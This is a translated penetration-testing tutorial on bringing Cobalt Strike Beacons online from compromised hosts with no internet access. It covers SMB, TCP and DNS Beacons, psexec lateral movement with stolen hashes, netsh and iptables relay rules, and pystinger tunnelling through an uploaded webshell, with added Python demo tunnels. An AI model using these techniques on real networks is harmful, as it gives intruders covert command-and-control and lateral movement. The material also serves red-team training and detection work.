Ways to bring Cobalt Strike online when the target has no outbound network access
2022-07-03 07:23:00 【yggcwhat】
Original source: Qi An Xin Attack and Defense Community - "Various postures for bringing CS online without outbound network" (butian.net)
A memo of the common ways to bring a host online in Cobalt Strike (CS) when it cannot reach the internet directly.
The screenshots below were taken at different times and in different lab environments, so the IP addresses are not consistent between sections.
0x01 A relay host is available
There is a relay host that itself can reach the internet. This is the most common case.
Typically you have taken an edge host with multiple network interfaces, and the internal hosts behind it have no outbound access. In that case the edge host is used as the relay, and the internal hosts can be brought online through it.
The topology is roughly as follows :

Online method 1: SMB Beacon
Introduction
From the official docs: the SMB Beacon uses named pipes to communicate through a parent Beacon. When two Beacons are linked, the child Beacon receives its tasks from, and sends its output through, the parent Beacon.
Because linked Beacons talk over Windows named pipes, the traffic is encapsulated in the SMB protocol. That makes the SMB Beacon relatively stealthy, and it works well for getting past host firewalls that already allow SMB.

Usage
Hosts that run an SMB Beacon must accept connections on port 445.
To derive an SMB Beacon: create an SMB Beacon listener under Listeners > target host > right-click > Spawn > select that listener > the child comes online.
Alternatively, in the Beacon console run spawn smb (smb is the name of my SMB listener).

Use the plugin, or a port scan, to scan the intranet hosts

Go to the Targets view and pick a target

Use psexec

Pick a hash, choose the SMB listener and the corresponding session

The host comes online


After it runs successfully the session shows the ∞∞ characters; this is the derived SMB Beacon.
While it is linked, you can use link <ip> in the parent Beacon to link it and unlink <ip> to disconnect it.


This kind of Beacon is widely used for lateral movement inside the intranet. You can upload an SMB Beacon payload to the target host over IPC$ and execute it there; the target will not come online by itself, you have to connect to it yourself with the link command (link <ip>).
Online method 2: pivot listener (Reverse TCP Beacon)
This is essentially the same as method 1, except that a pivot listener is created on the relay host's Beacon (right-click the Beacon > Pivoting > Listener...)

The listener fields below are filled in automatically

After that it is the same as above: discover the intranet host, obtain an account and password, move laterally with psexec and select the pivot listener



Online method 3: HTTP proxy
With this method the relay host does not itself need to be online in CS.
Use the goproxy project as the proxy. Project address:
https://github.com/snail007/goproxy
Steps:
1. Upload proxy.exe to the web server (the edge host) and start an HTTP proxy on port 8080
C:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon
2. Use netsh to redirect traffic that hits the intranet IP 192.168.111.131 on port 822 (pick an unused port, otherwise the portproxy fails) to the internet-facing IP 192.168.1.88 on port 8080
netsh interface portproxy add v4tov4 listenaddress=192.168.111.131 listenport=822 connectaddress=192.168.1.88 connectport=8080
netsh needs an elevated prompt, and portproxy depends on the IP Helper service (iphlpsvc) being running; confirm the rule with netsh interface portproxy show all.

3. Create the listener; its configuration (screenshot in the original) points the Beacon's HTTP proxy at the relay host, 192.168.111.131:822

4. Generate a stageless payload, run it on the business server, and it comes online

Connection path
192.168.111.236 → 192.168.111.131:822 → 192.168.1.88:8080 → C2 (192.168.1.89)
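As an added example (not code from the original post, from goproxy or from Cobalt Strike), the following Python models what the relay's HTTP proxy does in this chain: a minimal HTTP CONNECT proxy that dials the requested host and pipes bytes in both directions, plus a local self-test that plays the Beacon and the C2 on loopback with ephemeral ports. The `/__init.gif` path, the `TASKS` body and the port numbers are constructed for the demo; the same proxy role applies when the relay is Linux and the redirection is done with iptables instead of netsh.

```python
import socket
import threading


def parse_connect(request: bytes):
    """Return (host, port) from the request line 'CONNECT host:port HTTP/1.1'."""
    line = request.split(b"\r\n", 1)[0].decode(errors="replace")
    method, target, _version = line.split(" ")
    if method != "CONNECT" or ":" not in target:
        raise ValueError("not a CONNECT request: " + line)
    host, port = target.rsplit(":", 1)
    return host, int(port)


def _pipe(src, dst):
    """Copy bytes src -> dst until EOF, then shut both sides down."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def handle_client(client):
    """One proxied session: read the CONNECT request, dial upstream, relay."""
    req = b""
    while b"\r\n\r\n" not in req:
        chunk = client.recv(4096)
        if not chunk:
            client.close()
            return
        req += chunk
    try:
        host, port = parse_connect(req)
        upstream = socket.create_connection((host, port), timeout=5)
    except (ValueError, OSError):
        client.sendall(b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\n\r\n")
        client.close()
        return
    client.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
    threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
    _pipe(upstream, client)
    upstream.close()
    client.close()


def start_proxy(bind="127.0.0.1", port=0):
    """Start the CONNECT proxy (port 0 = ephemeral) and return the bound port.
    This is the role goproxy plays with `proxy http -t tcp -p 0.0.0.0:8080`."""
    ls = socket.socket()
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind((bind, port))
    ls.listen(8)

    def loop():
        while True:
            c, _ = ls.accept()
            threading.Thread(target=handle_client, args=(c,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return ls.getsockname()[1]


def start_fake_c2():
    """Stand-in for the teamserver: answers any request with a fixed body (constructed)."""
    ls = socket.socket()
    ls.bind(("127.0.0.1", 0))
    ls.listen(8)

    def loop():
        while True:
            c, _ = ls.accept()
            c.recv(4096)
            c.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nTASKS")
            c.close()

    threading.Thread(target=loop, daemon=True).start()
    return ls.getsockname()[1]


def beacon_via_proxy(proxy_port, c2_host, c2_port):
    """What a Beacon does when its HTTPS listener has a manual proxy configured:
    CONNECT to the C2 through the proxy, then talk to the C2 over the tunnel."""
    s = socket.create_connection(("127.0.0.1", proxy_port), timeout=5)
    s.sendall(f"CONNECT {c2_host}:{c2_port} HTTP/1.1\r\nHost: {c2_host}:{c2_port}\r\n\r\n".encode())
    if not s.recv(4096).startswith(b"HTTP/1.1 200"):
        s.close()
        return None  # the relay could not reach the C2
    s.sendall(b"GET /__init.gif HTTP/1.1\r\nHost: c2\r\n\r\n")  # constructed request
    body = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        body += chunk
    s.close()
    return body.split(b"\r\n\r\n", 1)[1]


def run_demo():
    """Beacon -> relay proxy -> C2 on loopback; returns the body the Beacon received."""
    return beacon_via_proxy(start_proxy(), "127.0.0.1", start_fake_c2())
```

Beacon uses CONNECT for HTTPS listeners; for a plain HTTP listener WinINet sends the absolute-URI form (GET http://host/path) to the proxy instead, which goproxy handles but this minimal proxy deliberately does not. Before deploying the payload, verify the real chain from the business host the same way, for example with curl -x http://192.168.111.131:822 against the teamserver URL from 192.168.111.236; if that fails, the portproxy rule or the goproxy process is the problem, not CS.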
Online method 4: TCP Beacon (bind)
- Bind (forward) connection: the parent Beacon connects to the TCP Beacon, not the other way round
- Similar to the SMB Beacon; it also needs a parent Beacon
- SMB Beacon and TCP Beacon are compatible with most of Cobalt Strike's derived-payload actions, except for the user-driven attacks that require an explicit stager (for example Attacks → Packages, Attacks → Web Drive-by).
Test:
Generate a TCP Beacon listener

Use this listener to generate a stageless payload:

Upload it to the target host and run it:

In the relay host's Beacon, use connect [ip address] [port] to make the bind connection, and the target comes online:

To tear down a Beacon link, run unlink [ip address] [session PID] in the console of the parent or child session. Later on, the same host (or another one) can connect to the TCP Beacon again.

Online method 5: forwarding through a pystinger proxy
Detailed pystinger usage is covered in a later section; this is only a short demonstration.
pystinger is not normally used in this scenario (where a relay host is available), but it works.
Test environment:
Attacker kali: 192.168.1.35
Web server: 192.168.1.70, 192.168.111.129
Business server: 192.168.111.236
Steps:
1. Upload proxy.php to the web server's site directory; a normal request to it returns UTF-8
The web server's external IP is 192.168.1.70

Upload stinger_server.exe and run it
start stinger_server.exe 0.0.0.0
On the attacker machine (192.168.1.89 in this screenshot) run
./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000
At this point the web server's port 60020 is mapped to port 60020 on the VPS (the attacker machine)
In CS create a listener whose HTTP Hosts is the relay host's intranet IP and whose port is 60020:

Move laterally with psexec and choose the pystinger listener, or generate a payload directly and run it on the business host; the intranet business host 192.168.111.236 comes online:


Addendum: the relay host is Linux
HTTP proxy (the relay host does not need to be online)
Usage is the same as method 3 above; only the port redirection is done with iptables instead of netsh. The rules must go in the nat table, otherwise the PREROUTING/POSTROUTING chains and the DNAT/SNAT targets are not available:
echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp -d 192.168.111.131 --dport 822 -j DNAT --to-destination 192.168.1.88:8080
iptables -t nat -A POSTROUTING -p tcp -d 192.168.1.88 --dport 8080 -j SNAT --to-source 192.168.111.131
Check the result with iptables -t nat -L -n; these rules do not survive a reboot unless saved.
Test:
Relay host (192.168.111.142)

Attacker

Generate a stageless payload, run it on the target host, and it comes online


Connection path: (screenshot retaken; the port changed from 8080 to 8081)

192.168.111.140 → 192.168.111.142:8080 → 192.168.111.142:8081 → 192.168.111.131:81 (C2)
Forwarding through a pystinger proxy
Same as online method 5 above: after the pystinger connection is established, generate a payload directly and run it on the business host; the intranet business host 192.168.111.236 comes online.
CrossC2
Bringing a Linux host online through another host's Beacon

Using CrossC2
Used to bring Linux or macOS hosts online
Project address (be sure to download the build matching your CS version):
https://github.com/gloxec/CrossC2
Configuration:
(my teamserver runs on Windows here)

Create an HTTPS listener:

Generate the payload
(another way)



If the GUI cannot generate it, it can also be generated directly from the command line
After generating, upload it to the Linux host and run it; it comes online:


Install the CrossC2Kit plugin to extend the Beacon's functionality


Bringing the intranet hosts online in CS:
Once the relay Linux host is online, the methods above can be used to bring the intranet hosts online.
TCP Beacon:


Upload it to the target host and run it.
Then connect from the Linux Beacon:

After it comes online the session shows as a black box; run checkin and it is live a second later
The two methods above (HTTP proxy and pystinger) are still the recommended ones.
0x02 The edge host can only send DNS traffic out
Bringing CS online over DNS
1. Preparation
1) A domain, registered at GoDaddy: yokan.xxx
2) A VPS with UDP port 53 opened on the firewall: 82.xxx.xxx.19

3) Cobalt Strike 4.1
2. Domain settings
1) Set up resolution
Configure an A record pointing at the VPS IP; CS also runs on that VPS

Configure several NS records pointing at the host name of that A record

Once configured, ping test.yokan.xxx resolves and answers

On the VPS check what is using port 53 and stop the service that holds it

systemctl stop systemd-resolved
After stopping it, make sure /etc/resolv.conf still points at a working resolver, otherwise the VPS itself can no longer resolve names.


2) Create the CS listener


3) Check with nslookup; it resolves:

Note: the address in the response, 74.125.196.113, is the value set in the Malleable C2 profile (dns_idle)

3. Bringing CS online
Generate a stageless CS payload and run it on the target; it comes online
The stageless DNS payload has an x64 build; the stager does not

After it comes online the session shows as a black box; use the checkin command to make the DNS Beacon call back to the teamserver

PS: this takes a little longer to show up than other listeners

After that you can interact normally:
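As an added example (not code from the original post or from Cobalt Strike), the following Python shows the mechanism the DNS listener relies on: the Beacon hex-encodes its data into subdomain labels of the attacker's domain and sends an A query; the attacker's server, which must own UDP/53 (hence stopping systemd-resolved), decodes the labels and answers with the idle address from the profile. The yokan.xxx domain and the 74.125.196.113 idle address are the page's; the `checkin` payload and the ephemeral loopback port used instead of 53 are constructed for the demo, and the DNS packets are built by hand with struct so it runs offline.

```python
import socket
import struct
import threading

MAX_LABEL = 63   # RFC 1035: one label is at most 63 bytes
MAX_NAME = 253   # practical limit for a whole name in text form


def encode_query_name(data: bytes, domain: str) -> str:
    """Beacon side: hex-encode data and split it into <=63-byte labels under domain."""
    hexed = data.hex()
    labels = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    name = ".".join(labels + [domain])
    if len(name) > MAX_NAME:
        raise ValueError(f"name is {len(name)} chars; send less data per query")
    return name


def decode_query_name(name: str, domain: str) -> bytes:
    """Server side: strip the domain, rejoin the labels and un-hex them."""
    if not name.endswith("." + domain):
        raise ValueError("query is not under our domain: " + name)
    return bytes.fromhex(name[:-len(domain) - 1].replace(".", ""))


def build_query(txid: int, name: str) -> bytes:
    """A-record query: header, QNAME as length-prefixed labels, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD set
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


def parse_name(pkt: bytes, off: int):
    """Read an uncompressed name at offset; returns (name, offset after it)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + n].decode())
        off += n


def build_a_response(query: bytes, ip: str) -> bytes:
    """Echo the question and add one A record (pointer 0xc00c = name at offset 12)."""
    txid = struct.unpack("!H", query[:2])[0]
    _, end = parse_name(query, 12)
    question = query[12:end + 4]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; 1 answer
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + socket.inet_aton(ip)
    return header + question + rr


def parse_a_answer(resp: bytes) -> str:
    """Beacon side: pull the IPv4 address out of the first (and only) answer."""
    _, end = parse_name(resp, 12)
    rdata = end + 4 + 2 + 10   # skip QTYPE/QCLASS, the name pointer, the fixed RR fields
    return socket.inet_ntoa(resp[rdata:rdata + 4])


def serve_once(sock, domain, idle_ip, seen):
    """Authoritative side: decode what the Beacon sent, answer with the idle IP."""
    pkt, addr = sock.recvfrom(512)
    name, _ = parse_name(pkt, 12)
    seen.append(decode_query_name(name, domain))
    sock.sendto(build_a_response(pkt, idle_ip), addr)


def run_demo(domain="yokan.xxx", idle_ip="74.125.196.113"):
    """One check-in on loopback; a real deployment binds 0.0.0.0:53 on the VPS."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    seen = []
    threading.Thread(target=serve_once, args=(srv, domain, idle_ip, seen), daemon=True).start()
    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    cli.settimeout(3)
    cli.sendto(build_query(0x1234, encode_query_name(b"checkin", domain)), srv.getsockname())
    resp, _ = cli.recvfrom(512)
    return seen[0], parse_a_answer(resp)
```

The 63-byte label and 253-byte name limits are why a DNS Beacon has to spread its data over many small queries, and why the channel is slow and the post says to wait after checkin. In the real setup the queries reach the VPS only because the NS records delegate the subdomain to it, so if nslookup on the target does not return the dns_idle address, the delegation or port 53 is the problem.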

0x03 The edge host has no outbound access at all
Method 1: TCP Beacon bind connection
<font color='red'>Scenario: none of the edge host's protocols can reach the internet, but the attacker can reach the edge host.</font>
Usage:
First bring your own attack host online as a Beacon; it will act as the relay

Then, exactly as in "online method 4", generate a stageless payload from a TCP Beacon listener, upload it to the target host and run it.

In the attack host's (relay's) Beacon use connect [ip address] [port] to make the bind connection, and the target comes online:

Method 2: the pystinger (毒刺) tool
<font color='red'>Scenario: none of the edge host's protocols can reach the internet, but it runs a web service and you already have a webshell on it.</font>
Project address:
https://github.com/FunnyWolf/pystinger
How it works, briefly:
pystinger implements a reverse proxy into the intranet: it carries traffic over HTTP through the webshell and maps a port on the target host to the port the CS server listens on, so a host whose only exposure is its web service can be brought online in CS without any outbound access.
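To make the "port mapping over HTTP" principle concrete, here is an added Python model (not pystinger's code) of the three parts: a target-side listener in the role of stinger_server, a webshell endpoint in the role of proxy.php that carries bytes in the POST body and in the response body, and a VPS-side poller in the role of stinger_client that delivers them to the local C2 port. Everything runs on loopback with ephemeral ports; the uppercasing fake C2, the `beacon checkin` payload and the polling interval are constructed for the demo.

```python
import http.client
import queue
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class MirrorTarget:
    """Target side (stinger_server's role): accept one Beacon connection on the
    mirror port and buffer bytes in both directions for the webshell to carry."""

    def __init__(self):
        self.up, self.down = queue.Queue(), queue.Queue()  # beacon->VPS, VPS->beacon
        self.lsock = socket.socket()
        self.lsock.bind(("127.0.0.1", 0))  # constructed: ephemeral port instead of 60020
        self.lsock.listen(1)
        self.port = self.lsock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.lsock.accept()
        threading.Thread(target=self._writer, args=(conn,), daemon=True).start()
        while True:
            data = conn.recv(4096)
            if not data:
                return
            self.up.put(data)

    def _writer(self, conn):
        while True:
            conn.sendall(self.down.get())

    def drain_up(self):
        out = b""
        while not self.up.empty():
            out += self.up.get_nowait()
        return out


class WebshellHandler(BaseHTTPRequestHandler):
    """proxy.php's role: POST body = bytes for the Beacon, response body = bytes
    the Beacon has sent since the last poll."""
    target = None

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if body:
            self.target.down.put(body)
        out = self.target.drain_up()
        self.send_response(200)
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_webshell(target):
    WebshellHandler.target = target
    srv = HTTPServer(("127.0.0.1", 0), WebshellHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]


def start_fake_c2():
    """Stand-in for the CS listener on the VPS: echoes each chunk uppercased (constructed)."""
    lsock = socket.socket()
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(1)

    def serve():
        conn, _ = lsock.accept()
        while True:
            data = conn.recv(4096)
            if not data:
                return
            conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()[1]


def vps_client_pump(webshell_port, c2_port, rounds=40, interval=0.05):
    """VPS side (stinger_client's role): poll the webshell over HTTP, hand Beacon
    bytes to the local C2 port and ship the C2's replies back on the next poll."""
    c2 = socket.create_connection(("127.0.0.1", c2_port))
    c2.settimeout(interval)
    pending = b""
    for _ in range(rounds):
        conn = http.client.HTTPConnection("127.0.0.1", webshell_port)
        conn.request("POST", "/proxy.php", body=pending)
        from_beacon = conn.getresponse().read()
        conn.close()
        pending = b""
        if from_beacon:
            c2.sendall(from_beacon)
        try:
            pending = c2.recv(4096)
        except socket.timeout:
            pass
    c2.close()


def run_demo():
    """A Beacon on the no-egress host connects to the local mirror port and gets
    back an answer that only the VPS-side C2 could have produced."""
    target = MirrorTarget()
    webshell_port, c2_port = start_webshell(target), start_fake_c2()
    threading.Thread(target=vps_client_pump, args=(webshell_port, c2_port), daemon=True).start()
    beacon = socket.create_connection(("127.0.0.1", target.port))
    beacon.settimeout(5)
    beacon.sendall(b"beacon checkin")
    reply = beacon.recv(4096)
    beacon.close()
    return reply
```

This is why the CS listener in the pystinger setup is configured with the target's own intranet IP (or 127.0.0.1) and port 60020: from the Beacon's point of view the C2 is a local port, and the only traffic that leaves the target is the webshell's ordinary HTTP request/response pairs, which is also why the README warns that stinger_server must be started with start (a blocking foreground process inside the webshell would tear the TCP side down).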

Usage
Address:
https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md
Copied directly from the README:
Assume the server without outbound access is reachable at http://example.com:8080 and its intranet IP is 192.168.3.11
SOCKS4 proxy
- Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is reachable and the page returns UTF-8
- Upload stinger_server.exe to the target server and run it from AntSword / Behinder (冰蝎):
  start D:/XXX/stinger_server.exe   (starts the server)
  Do not run D:/XXX/stinger_server.exe directly; it can cause the TCP connection to drop
- On the VPS run
  ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
- The following output indicates success
[email protected]:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
- The VPS now has a socks4a proxy into example.com's intranet listening on 127.0.0.1:60000
- The target server's 127.0.0.1:60020 is now mapped to the VPS's 127.0.0.1:60020
Cobalt Strike, single host online
- Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is reachable and the page returns UTF-8
- Upload stinger_server.exe to the target server and run it from AntSword / Behinder (冰蝎):
  start D:/XXX/stinger_server.exe   (starts the server)
  Do not run D:/XXX/stinger_server.exe directly; it can cause the TCP connection to drop
- Run stinger_client from the command line
  ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
- The following output indicates success
[email protected]:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
- Add a listener in Cobalt Strike; for the port use the Handler/LISTEN port printed under RAT Config (usually 60020), and set the Beacons host to 127.0.0.1
- Generate the payload, upload it to the host and run it
Cobalt Strike, multi-host online
- Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is reachable and the page returns UTF-8
- Upload stinger_server.exe to the target server and run it from AntSword / Behinder (冰蝎):
  start D:/XXX/stinger_server.exe 192.168.3.11   (starts the server)
  192.168.3.11 can be replaced with 0.0.0.0
- Run stinger_client from the command line
  ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
- The following output indicates success
[email protected]:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
- Add a listener in Cobalt Strike; for the port use the Handler/LISTEN port printed under RAT Config (usually 60020), and set the Beacons host to 192.168.3.11 (the intranet IP of example.com)
- Generate the payload, upload it to the host and run it
- When moving laterally to other hosts, point their payloads at 192.168.3.11:60020 and they come online too
Custom headers and proxy
- If the webshell needs a Cookie or Authorization header, set the request headers with the --header parameter
  --header "Authorization: XXXXXX,Cookie: XXXXX"
- If the webshell has to be reached through a proxy, set it with --proxy
  --proxy "socks5:127.0.0.1:1081"
Test
Attacker: 192.168.1.89
Suppose we have taken a target host that cannot reach the internet.

Use pystinger to bring it online in CS: through the webshell it provides a SOCKS4 proxy into the intranet, and its port mapping lets a host with no outbound access come online in CS.
First upload the proxy script matching the target's web stack to the target server.

Upload stinger_server.exe to the target server and start it from AntSword / Behinder with start stinger_server.exe


Upload stinger_client to the teamserver host and run it with -w pointing at the proxy script's URL.
chmod +x stinger_client
./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

Create a new listener in CS with the host set to the target's intranet IP and the default port 60020 (the teamserver and stinger_client must run on the same server).

Generate a payload, upload it to the target server and execute it. A new host appears online in CS.
